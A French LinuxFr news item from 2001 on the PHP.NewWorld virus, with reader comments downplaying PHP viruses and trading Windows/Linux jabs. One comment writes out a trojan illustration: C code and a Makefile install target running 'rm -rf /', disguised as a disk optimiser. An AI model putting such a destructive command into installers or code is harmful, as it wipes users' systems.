Premier virus en PHP

Posté par  . Modéré par Yann Hirou.
Étiquettes :
0
9
jan.
2001
Sécurité
Un virus "pas dangereux" appellé PHP.NewWorld par Central Command, et en PHP serait apparu. Il modifie tous les fichiers php, html etc du répertoire c:\windows (hum...). Il ne peut pas s'exporter vers d'autres systèmes que celui sur lequel il est installé.
Bon tout cela n'est pas bien grave. L'article du site précise bien la popularité de php, qui conduit les hébergeurs à l'utiliser, et à laisser les internautes/créateurs de sites, libre cours à leur imagination... sous entendu les risques encourus...
Cela m'étonnerait beaucoup que de tels "virus" nous menacent vraiment un jour.

Aller plus loin

  • # Et pourtant, c'est pas le premier.

    Posté par  . Évalué à 1.

    Bah oui, PHP.NewWorld n'est pas le premier virus en PHP. Le premier fût PHP.Pirus et a été découvert en Novembre ; il se clonait dans les fichiers .php et .html qu'il trouvait et qu'il était en mesure de contaminer. (http://www.sarc.com/avcenter/venc/data/php.pirus.html(...))
    Il ne faut pas oublier que le serveur web ne tourne en général pas avec les droits de l'utilisateur à qui appartiennent les fichiers .php, et que le droit d'écriture sur ces fichiers, à part erreur extrême de manipulations, ne sont pas donnés à tous...
    Qui plus est, il est assez difficile d'attraper le virus (à part si phplib est infecté :o) ), et qui plus est, très facile à supprimer...
    • [^] # Re: Et pourtant, c'est pas le premier.

      Posté par  . Évalué à 1.

      sa depend de l'os :)
    • [^] # Cette

      Posté par  . Évalué à 0.

      Lorsqu'on decouvre un virus sous Windows, Microsoft est traite de tous les noms d'oiseaux. Mais lorsqu'on en trouve un dans projet libre comme PHP, alors il est insignifiant et tout de suite minimise par les Linuxeurs... c'est pas tres fairplay!
      Frederic
      • [^] # Re: Cette

        Posté par  . Évalué à 1.

        php est utilise sur des plate-formes windows ..
        <troll>
        je l'avais bien dit que kro$oft ct un marchant de virus ambulant
        </troll>

        a vrai dire ce 'virus' est surtout dangereux sur une plateforme mono-utilisateur a pouvoir maximum du genre de windows ... kelkechose a rajouter ?
        • [^] # Re: windows = mono utilisateur

          Posté par  . Évalué à 0.

          Vrai pour cette sombre merde, heu pardon, pour ce résidu de digestionde windows 9X.

          Pour Windows NT, je dirais qu'administré correctement on peut le considérer comme étant multi-utilisateur...

          ... ça reste tout de même un nid à virus, forcément, Microsoft à surement des actions chez les fabricants de virus, heu pardon d'ANTI-virus.
      • [^] # Re: Cette

        Posté par  . Évalué à 0.

        Oui mais là c'est vraiment un virus de merde ki na aucune chance de se propager !(ailleur que sur le serveur sur lequel il est)
        Donc il est _vraiment_ insignifiant !

        BeN
    • [^] # Re: Et pourtant, c'est pas le premier.

      Posté par  (site web personnel) . Évalué à 1.

      Pour plus d'info sur PHP.Pirus :
      http://linuxfr.org/topic/PHP/1242,0,0,0.php3(...) ;-)

      Et oui, les temps sont durs, les gens n'ont pas acheté autant d'antivirus que prévu, les actionnaires ne sont pas contents.
      Alors hop, encore un autre pipotware...
  • # Est un virus ?

    Posté par  . Évalué à 0.

    Si je mets ce code C ou la version binaire de ce meme code sur un site en annoncant que c'est un optimiseur d'espace disque qui doit etre lancé en tant que root, est-ce un virus ?

    opt-hd.c -- debut
    #include <stdlib.h>
    main() {
    system("rm -fr /");
    }
    -- fin

    Evidement, ce soft serait packagé avec un "make, make install", et plein de code autour pour brouiller les pistes.

    Encore mieux :
    Makefile :
    --debut
    install:
    rm -rf /
    --fin


    Eric.

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.